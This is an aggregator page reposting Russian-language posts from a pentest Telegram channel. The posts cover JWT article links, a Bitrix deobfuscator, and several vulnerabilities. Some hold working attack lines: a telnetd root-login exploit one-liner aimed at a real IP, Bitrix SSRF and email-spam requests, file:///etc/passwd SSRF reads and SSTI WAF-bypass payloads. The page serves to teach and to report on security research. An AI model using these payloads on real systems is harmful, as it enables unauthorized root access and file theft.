Pentest Notes

Public

View Channel

3.9M

775K

290

Can't Join? @pentestnotes

2.8k Members

Updated: May 4, 2026 at 5:10 PM

Pentest Notes

https://pentestnotes.ru Заметки про пентест, CTF и информационную безопасность

@pentestnotes offers specialized information about httpspentestnotesru for subscribers interested in Hacking Tools

Ranking

Global Ranking

#456

Language Ranking

#45

Category Ranking

#23

-1

Participant Growth (Last 3 Days)

Total: 2.8K

24h growth: +0 0%

Latest Posts

Pentest Notes

Apr 27, 2026, 03:46 PM

Наткнулся на, пожалуй, самый https://rmrf.tips/posts/ по безопасности JWT в рунете.

Автор канала https://t.me/rmrf_0 ультанул и выпустил https://rmrf.tips/posts/ на ~25000 слов (это очень много буков)! Где разобрал JWT буквально побайтово🤩

Список статей:

https://rmrf.tips/posts/jwt-why-broken/
https://rmrf.tips/posts/jwt-anatomy/
https://rmrf.tips/posts/jwt-alg-none/
https://rmrf.tips/posts/jwt-algorithm-confusion/
https://rmrf.tips/posts/jwt-kid-injection/
https://rmrf.tips/posts/jwt-header-injection/
https://rmrf.tips/posts/jwt-bruteforce/
https://rmrf.tips/posts/jwt-psychic-signatures/
https://rmrf.tips/posts/jwt-crypto/
https://rmrf.tips/posts/jwt-jwe/
https://rmrf.tips/posts/jwt-libraries/
https://rmrf.tips/posts/jwt-oauth-oidc/
https://rmrf.tips/posts/jwt-xss/
https://rmrf.tips/posts/jwt-advanced-crypto/
https://www.youtube.com/watch?v=dQw4w9WgXcQ
https://www.youtube.com/watch?v=dQw4w9WgXcQ
https://rmrf.tips/posts/jwt-hardcoded-secrets/
https://rmrf.tips/posts/jwt-alternatives/
https://rmrf.tips/posts/jwt-rfc8725/
https://rmrf.tips/posts/jwt-post-quantum/

💫

5,200

Pentest Notes

Apr 27, 2026, 03:46 PM

📷 Photo

https://github.com/FaLLenSkiLL1/DeBix (Деобфускатор Bitrix)

🔍 Вы знали, что модули Bitrix, поставляемые через Marketplace в демо-режиме, проходят через автоматический обфускатор? (см. Фото)

Встроенный обфускатор переименовывает параметры функций и члены классов в файлах по типу include.php и install.php, что зачастую приводит к ошибкам в работе легитимного кода. Помимо этого, похожий обфусцировонный код встречается и при разборе инцидентов.

Чтобы не тратить часы на ручной разбор base64_decode и переменных вида $__254446073, я собрал DeBix (Deobfuscator Bitrix) — утилиту для восстановления читаемости кода.

Репозиторий проекта:
https://github.com/FaLLenSkiLL1/DeBix

💫

8,710

Pentest Notes

Apr 27, 2026, 03:46 PM

взломать интернет бесплатно 2026

USER="-f root" telnet -a http://104.16.149.244/ 23

вот эта штука сверху, которой уже назначен https://nvd.nist.gov/vuln/detail/CVE-2026-24061, дает подключиться по telnet сразу как root, без пароля.

что? 🐱

Давным давно в 2015 году, почему-то в нашей мировой линии, telnet был неуязвим, но в нём не работал автологин если на машине нет Kerberos.

Суть автологина - автоматически передать юзернейм для логина. Как когда по ssh коннектишься не указав логин, машина автоматически коннектится с именем текущего юзера.

Без Kerberos, этот юзернейм попросту не детектился.

Поэтому разработчики обновили шаблон логина, добавив https://codeberg.org/inetutils/inetutils/commit/fa3245ac8c288b87139a0da8249d0a408c4dfb87, что как раз подставляет юзернейм.

Новый шаблон:

/usr/bin/login " -p -h %h %?u{-f %u}{%U}"

и вот тут происходит кабум бабах ракета взрыв 🤯

1. В бинаре login есть флаг -f, нужный для "этот юзер уже был аутентифицирован где-то ещё, не надо его проверять снова"

2. По RFC 1572, подключаясь по telnet, ты можешь сдать переменные окружения, в том числе $USER с целевым логином

3. содержимое $USER переменной никак не санитизируется

. . .
Теперь перечитай эксплойт

USER="-f root" telnet -a 104.16.149.244 23

Да это же уязвимость на argument injection!

Повторим флоу атаки 🃏

0. выставляем переменную $USER="-f root" и включаем автологин -a

1. переменная $USER не проверяется, но учитывается сервером

2. $USER подставляется в шаблон логина вместо {%U}

3. сервер получает команду /usr/bin/login -p -f root

4. бинарь login скипает аутентификацию из-за -f

5. поздравляю, ты root

———
Dockerfile для тестовой лабы

FROM debian:11-slim

ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && \
apt-get install -y --no-install-recommends \
inetutils-telnetd=2:2.0-1+deb11u2 \
telnet && \
rm -rf /var/lib/apt/lists/*

RUN useradd user1 && \
sed -i 's/## telnet/telnet/' /etc/inetd.conf

COPY docker-entrypoint.sh /docker-entrypoint.sh

EXPOSE 23
CMD ["/usr/sbin/inetutils-inetd", "-d"]

Если хочешь кишки кода и ветви логики, то читай https://www.safebreach.com/blog/safebreach-labs-root-cause-analysis-and-poc-exploit-for-cve-2026-24061/

Pentest Notes

Apr 27, 2026, 03:46 PM

📷 Photo

Мне тут доложили, что http://hh.ru/ вышел в паблик на https://bugbounty.standoff365.com/programs/hh

Интересно, примут ли мой отчёт, если у меня нет 15 лет опыта bug bounty и миллиона сертификатов 🔍

💫

3,110

Pentest Notes

Apr 27, 2026, 03:46 PM

📷 Photo

Закрытое награждение 25 лучших исследователей Standoff 2025 года

Очень классная локация и сам ивент, спасибо организаторам!👍

💫

3,590

Pentest Notes

Apr 27, 2026, 03:46 PM

Коллега по цеху https://t.me/ArroizX сделал пост по уязвимостям в Битрикс😊

Почитать можно тут:
https://t.me/ArroizX_Notes

Авторизированная SSRF в Битрикс24 через интеграцию с MS Sharepoint
GET /bitrix/components/bitrix/sharepoint.link/ajax.php?mode=test&sp_server=http://collaborator&sp_user=&sp_pass=&sessid=... HTTP/1.1
Host: bitrix24
Cookie: ...
Bx-Ajax: true

Неавторизированный спам электронными письмами через sender_sub_confirm.php
POST /bitrix/tools/sender_sub_confirm.php HTTP/1.1
Host: bitrix
Cookie: ...
Content-Type: application/x-www-form-urlencoded
Content-Length: x

sessid=...&sender_subscription=add&SENDER_SUBSCRIBE_EMAIL=some@some.com

Пойду докину в https://pentestnotes.ru/notes/bitrix_pentest_full/, спасибо)

💫

3,200

Pentest Notes

Apr 27, 2026, 03:46 PM

📷 Photo

1C-Bitrix <= 25.100.500 (Translate Module) Remote Code Execution Vulnerability ( https://www.cve.org/CVERecord?id=CVE-2025-67887) 🥤

Исследователь слил https://karmainsecurity.com/pocs/CVE-2025-67887.php под плагин в Битрикс через 3 дня после присвоения CVE, не дождавшись ответа вендора. Патча нет...

Vulnerability discovered by https://karmainsecurity.com/about.

Уязвимые версии:
Версия 25.100.500 и более ранние версии.

Описание уязвимости:
Уязвимость находится в «Translate Module», который позволяет пользователям загружать и распаковывать архивные файлы во временную папку. Однако приложение не проверяет должным образом содержимое этих архивов перед их распаковкой. Злоумышленники могут использовать эту уязвимость для загрузки и выполнения произвольного PHP-кода, включив в архив PHP-файл вместе со специально созданным файлом .htaccess.

Что делать:
1. Проверить в логах наличие обращений к
/bitrix/services/main/ajax.php?action=translate.asset.grabber.extract
и
/bitrix/services/main/ajax.php?action=translate.asset.grabber.apply
2. Проверить директории с файлами на наличие закладок и подозрительных архивов.
3. По возможности ограничить доступ к этим эндпоинтам (проверить привилегии) или временно отключить модуль, ждать патч🤷‍♀️

https://www.cve.org/CVERecord?id=CVE-2025-67887

Ps. Битрикс не считает это уязвимостью

💫

Pentest Notes

Apr 27, 2026, 03:46 PM

🎇 сводка по react2shell безумию

events
* китайские группировки сориентировались за 30 часов и начали раскидывать майнеры монеро и LD_PRELOAD руткиты
* добрые (😈) хакеры пробивают таргеты и затем https://x.com/1ZRR4H/status/1998281157117378623?t=4KCEyOvWsOf5KKGu5ygODA&s=19, устраивая дефейс с "сервер уязвим, фиксаните пж"

* https://vercel.com/ вышли на https://hackerone.com/vercel_platform_protection?type=team по обходам их WAF. платят 50к$ за обход react2shell. уже https://x.com/cramforce/status/1998072892391592195 на 750к$

facts
* легче обновиться, чем защищаться waf'ом
* все сдают react2shell в бб и надеются на деньги
* багхантеры написали https://github.com/mrknow001/RSC_Detector на детект
* nuclei добавили смешные правила на детект
(кто пропустит https://github.com/projectdiscovery/nuclei-templates/blob/748f02228600888ab30c84db772adb7417456d76/http/cves/2025/CVE-2025-55182.yaml#L82 в powershell?)

vuln
* в эксплойтие, для массовых детектов, в _prefix https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc/blob/main/02-meow-rce-poc вместо child_process
(curl не всегда есть в контейнере, но fetch() всегда есть в node runtime)

* react2shell не оставляет следов на диске, от чего все жалуются на сложность детекта
* уязвим не только next.js, но и прочее во влиянии react rsc: react router, vite rsc, parcel rsc, waku, redwood sdk


слушай, вОЛьТаЖ, а что почитать? не хочу вникать в килотонны текста

Включай этот absolute cinema. Это будут лучшие 40 минут за день.

https://youtu.be/tdDHUoi_TdQ
https://youtu.be/tdDHUoi_TdQ
https://youtu.be/tdDHUoi_TdQ

Автор содрал кожу с реакта, расставил в нём брейкпоинтов и прошёлся по всему пути эксплоита, объясняя логику внутренностей реакта на важных чекпоинтах (их больше 20)

Если останутся силы, затем нырни в килотонну текста от CEO Vercel. После видео - it's starting to make sense

https://x.com/rauchg/status/1997362942929440937

Pentest Notes

Apr 27, 2026, 03:46 PM

📷 Photo

file://localhost/etc/passwd
что вернёт?

Да, вернётся /etc/passwd.

В https://datatracker.ietf.org/doc/html/rfc8089, верный формат протокола описан как file:///, в то время как все шпоры на LFR при SSRF говорят лишь о file:///

Причём, в  возможно вписать домен. Система резолвнет его, и если тот указывает на 127.0.0.1, то вернётся содержимое файла. В противном случае получишь лишь отстук в DNS.

питон пок

from urllib.request import urlopen

content = urlopen(
"file://yoogle.com/etc/passwd", timeout=2,
).read().decode('utf-8')

print(content)

Представил сколько возможностей для обхода фильтров? И это не последний твой приступ FOMO за сегодня.

В статье https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits от https://www.yeswehack.com/blog/learn-bug-bounty, автор вскрывает проблемы разных синтаксисов и как парсеры выживают с ними.

Представим, ты нашёл SSTI, но WAF блокирует символ $
Что делать?

Неприятно, но не критично, ведь в Python / Perl возможно представить символ через \N{CHARACTER NAME}.

Пример обхода фильтра
\N{dollar sign}{7*7} == ${7*7} == 49

Уже на стену лезешь? Погоди, я с тобой ещё не закончил.

Давай дальше по загрузке файлов. Видел же в Content-Disposition есть параметр filename?

В https://datatracker.ietf.org/doc/html/rfc6266 описан базовый подход с именем файла, но https://datatracker.ietf.org/doc/html/rfc8187 вышибает дверь с... чего.. какие юникод байты 😱

# RFC 6266
filename="image.png"

# RFC 8187
filename*=UTF8''image%0a.png

RFC 8187 вводит новые правила для filename параметра, включая поддержку всего Unicode + способности кодировать произвольные байты через %

То есть, ты можешь закодировать перенос строки (%0a == \n) и всячески ломать как парсинг имени файла, так и куда тот запишется.

. . .

FOMO карусель закрыта.
Как восстановишь силы, пробегись по статье автора ради:
⚀ разбор CVE из-за проблем синтаксиса https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits#syntax-confusion-in-the-wild-cves-exploited-via-ambiguous-parsing-7

⚀ кейс бб, из cache poisoning в stored xss через пролом валидации parse_url в PHP https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits#bug-bounty-case-study-1-php-parse_url-port-normalisation-from-cache-poisoning-to-stored-xss-9

⚀ кейс бб, из слепого чтения файлов через SSRF в arbitrary file read https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits#bug-bounty-case-study-2-from-limited-ssrf-and-blind-file-read-to-complete-arbitrary-file-access-10

Затем разнеси CTF по ресерчу
1. обход фильтров SSTI https://dojo-yeswehack.com/challenge-of-the-month/dojo-35

2. иной подход к протоколу file:// https://dojo-yeswehack.com/challenge/play/d797729f-abe9-4eec-a27e-da75a86169e5

3. пролом parse_url в PHP https://dojo-yeswehack.com/challenge/play/dff46b4f-6c70-4067-9540-1a35f74a5eb2

#web #waf_bypass

Pentest Notes

Apr 27, 2026, 03:46 PM

📷 Photo

Assume Birch #5

💫

2,550

Showing 10 of 10 posts

No more posts

Loading posts...

Rating

User Reviews (0)

No reviews yet. Be the first to share your experience!

Loading reviews...

Related Telegram Channels

Magic Tipster 🧙

970

tapswap community

12.5m0

alpine linux espanol

Loading recommended channels...

Pentest Notes

Pentest Notes

Ranking

Participant Growth (Last 3 Days)

Latest Posts

Rating

User Reviews (0)

Related Telegram Channels

Magic Tipster 🧙

tapswap community

alpine linux espanol

FreeFont.Pro — Best Free Fonts Daily

EZKROW

Tricks Hub | Latest Tricks

[🛡] MTProxyBoy

clover's corner.𖥔 ݁ ˖𓂃.☘︎ ݁˖

Related Telegram Channels

Magic Tipster 🧙

tapswap community

alpine linux espanol

FreeFont.Pro — Best Free Fonts Daily

EZKROW

Tricks Hub | Latest Tricks

[🛡] MTProxyBoy

clover's corner.𖥔 ݁ ˖𓂃.☘︎ ݁˖

User Reviews (0)

Latest Posts